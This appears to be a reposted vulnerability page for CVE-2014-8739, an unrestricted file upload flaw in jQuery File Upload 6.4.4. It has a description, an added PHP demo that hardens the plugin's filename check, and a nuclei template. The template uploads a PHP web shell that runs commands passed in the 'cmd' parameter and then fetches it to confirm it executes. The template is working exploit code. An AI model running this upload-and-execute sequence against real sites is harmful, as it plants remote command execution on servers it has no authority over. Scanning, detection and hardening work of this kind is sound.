jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability information

Vulnerability name: jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability ID:

  • CVE: CVE-2014-8739

Vulnerability type: File upload

Severity: Critical

Vulnerability description: jQuery File Upload is a widely used file upload plugin that supports several upload modes and is commonly embedded in websites' upload features; it has been adopted by many sites for its ease of use and flexibility. In version 6.4.4, server/php/UploadHandler.php does not strictly validate the type of uploaded files, which results in an unrestricted file upload vulnerability: the handler's default accept_file_types option is the regex /.+$/i, so any filename, including one ending in .php, passes validation and is written into the web-accessible files/ directory. An attacker can therefore upload an arbitrary file, including a PHP script, and execute arbitrary code on the server simply by requesting it. The technical root cause is that the server side never checks the uploaded file's extension or content against an allow-list, so the intended restrictions are bypassed. Successful exploitation gives remote code execution and full control of the affected server, which can in turn lead to data theft, service disruption or other malicious activity. The vulnerability requires no authentication and is trivially automated, so it poses a serious threat to any site using this plugin.
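As an added illustration (not code from the jQuery File Upload project or from the original page), the following standalone PHP script reproduces the filename test that UploadHandler.php performs with preg_match against its accept_file_types option, and contrasts the permissive default with an allow-list. The option names accept_file_types, max_file_size, upload_dir and upload_url are real UploadHandler options and passing an array to new UploadHandler($options) in server/php/index.php is the documented way to override them; the build_hardened_options() and contains_executable_extension() helpers, the directory paths and the sample filenames are assumptions constructed for this example.

```php
<?php
// Added example: reproduces the extension check in jQuery File Upload's
// UploadHandler::validate(), which runs preg_match($options['accept_file_types'], $file->name).
// Not the project's own code; the sample filenames below are constructed for this demo.

// Default shipped with the plugin: matches any non-empty name, so shell.php is accepted.
const VULNERABLE_ACCEPT_TYPES = '/.+$/i';

// Allow-list: only image extensions, anchored at the end of the name.
const HARDENED_ACCEPT_TYPES = '/\.(gif|jpe?g|png)$/i';

/**
 * Mirrors the plugin's filename test. Returns true when the upload would be
 * accepted under the given accept_file_types pattern.
 */
function upload_name_accepted(string $name, string $pattern): bool
{
    return preg_match($pattern, $name) === 1;
}

/**
 * Second line of defence (hypothetical helper, not in the plugin): the name
 * check only looks at the last extension, so also reject any name that carries
 * a server-side executable extension anywhere in it, e.g. shell.php.jpg, which
 * Apache's mod_mime may still hand to PHP when AddHandler is configured for .php.
 */
function contains_executable_extension(string $name): bool
{
    return preg_match('/\.(php\d?|phtml|phar|pht)(\.|$)/i', $name) === 1;
}

/**
 * Options array to pass as new UploadHandler($options) in server/php/index.php.
 * upload_dir is placed outside the document root so that even a file that
 * slips through the allow-list cannot be requested (and so executed) directly.
 * The paths and the size limit are assumptions for this example.
 */
function build_hardened_options(): array
{
    return [
        'accept_file_types' => HARDENED_ACCEPT_TYPES,
        'max_file_size'     => 5 * 1024 * 1024,           // 5 MiB, example limit
        'upload_dir'        => '/var/uploads/private/',   // assumed, outside web root
        'upload_url'        => '/download.php?file=',     // assumed download proxy
    ];
}

// Constructed sample filenames covering the interesting cases.
$samples = ['photo.jpg', 'shell.php', 'shell.PHP', 'shell.php.jpg', 'notes.phtml', '.htaccess'];

printf("%-16s %-10s %-10s %s\n", 'filename', 'default', 'allowlist', 'exec-ext?');
foreach ($samples as $name) {
    printf(
        "%-16s %-10s %-10s %s\n",
        $name,
        upload_name_accepted($name, VULNERABLE_ACCEPT_TYPES) ? 'accepted' : 'rejected',
        upload_name_accepted($name, HARDENED_ACCEPT_TYPES) ? 'accepted' : 'rejected',
        contains_executable_extension($name) ? 'yes' : 'no'
    );
}
```

Run it with php hardening_demo.php. The table shows shell.php accepted by the default pattern and rejected by the allow-list, while shell.php.jpg passes both regexes and is only caught by the second check; that is why moving upload_dir outside the web root (or serving the upload directory with a handler that never executes scripts) matters more than the extension regex alone.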

Vendor: jquery_file_upload_project

Product: jQuery File Upload

Affected versions: 6.4.4

Source: https://github.com/projectdiscovery/nuclei-templates/blob/14890e4f38c4320c53e77d6d1cec77bdacff53d6/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: |
    jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve,cve2014,edb,file-upload,intrusive,jquery,kev,rce

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
      system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950


http://example.com/2025/08/01/github_814263731/
Author
lianccc
Published
August 1, 2025
License